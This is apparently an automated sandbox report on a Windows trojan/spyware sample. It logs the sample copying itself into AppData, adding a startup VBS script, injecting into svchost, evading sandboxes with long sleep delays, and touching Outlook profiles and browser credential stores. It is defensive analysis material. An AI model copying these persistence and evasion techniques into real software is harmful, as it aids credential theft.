              Source: 3.3.svchost.exe.305af20.1.raw.unpack, -k.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, -cA-.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, -cA-.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/10@4/4
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C637B5 GetLastError,FormatMessageW
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C510BF AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00EC10BF AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00EC16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C7A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C6648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00BF42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | File created: C:\Users\user\AppData\Local\nonsubmerged
              Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: NULL
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | File created: C:\Users\user\AppData\Local\Temp\aut650B.tmp
              Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"
              Source: DSD876543456780000.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: svchost.exe, 00000003.00000002.4473198929.000000000540F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2236229139.00000000062AA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005434000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005440000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005401000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000584D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2679722335.00000000066BA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000581C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000580E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: DSD876543456780000.exe | ReversingLabs: Detection: 37%
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | File read: C:\Users\user\Desktop\DSD876543456780000.exe
              Source: unknown | Process created: C:\Users\user\Desktop\DSD876543456780000.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Process created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
              Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dpapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: DSD876543456780000.exe | Static file information: File size 1113600 > 1048576
              Source: DSD876543456780000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: DSD876543456780000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: DSD876543456780000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: DSD876543456780000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: DSD876543456780000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: DSD876543456780000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: DSD876543456780000.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
              Source: DSD876543456780000.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: DSD876543456780000.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: DSD876543456780000.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: DSD876543456780000.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: DSD876543456780000.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BF42DE
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C10A76 push ecx; ret 0_2_00C10A89
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00BF5C92 push 00000043h; ret 0_2_00BF5C94
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00E80A76 push ecx; ret 2_2_00E80A89
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00423149 push eax; ret 3_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004231C8 push eax; ret 3_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040E21D push ecx; ret 3_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_076BE558 push eax; iretd 3_2_076BE559
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00423149 push eax; ret 6_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004231C8 push eax; ret 6_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040E21D push ecx; ret 6_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_07ACE558 push eax; iretd 6_2_07ACE559
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | File created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe

              Boot Survival

              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs (3 occurrences)
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C0F98E
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C81C41
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00E7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00E7F98E
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00EF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00EF1C41
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
              Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOOPENFILEERRORBOX (59 occurrences)
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
              Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOOPENFILEERRORBOX (59 occurrences)

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | API/Special instruction interceptor: Address: 35C3274
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | API/Special instruction interceptor: Address: 13D3274
              Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 5190000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 5190000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 7190000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 55A0000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 55A0000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 75A0000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Windows\SysWOW64\svchost.exe | Thread delayed: delay times (first run, 51 events): 922337203685477, 600000, 599890, 599781, 599671, 599562, 599453, 599341, 599234, 599125, 599015, 598906, 598796, 598686, 598573, 598453, 598340, 598234, 598124, 598015, 597906, 597796, 597687, 597568, 597437, 597323, 597203, 597093, 596984, 596875, 596765, 596656, 596546, 596437, 596325, 596218, 596109, 596000, 595890, 595781, 595671, 595562, 595453, 595343, 595234, 595125, 595015, 594906, 594796, 594687, 594578
              Source: C:\Windows\SysWOW64\svchost.exe | Thread delayed: delay times (second run, 51 events): 922337203685477, 600000, 599875, 599766, 599656, 599547, 599438, 599328, 599219, 599109, 598998, 598724, 598594, 598484, 598375, 598263, 598156, 598047, 597938, 597828, 597719, 597594, 597484, 597375, 597266, 597156, 597047, 596938, 596813, 596703, 596594, 596469, 596359, 596250, 596141, 596031, 595922, 595812, 595702, 595594, 595469, 595359, 595250, 595141, 595031, 594922, 594813, 594688, 594563, 594453, 594344
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1746Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 8107Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 7854Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2001Jump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeAPI coverage: 4.0 %
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeAPI coverage: 4.5 %
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5704Thread sleep count: 1746 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 5704Thread sleep count: 8107 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599671s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599341s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7092Thread sleep time: -599234s >= -30000sJump to behavior
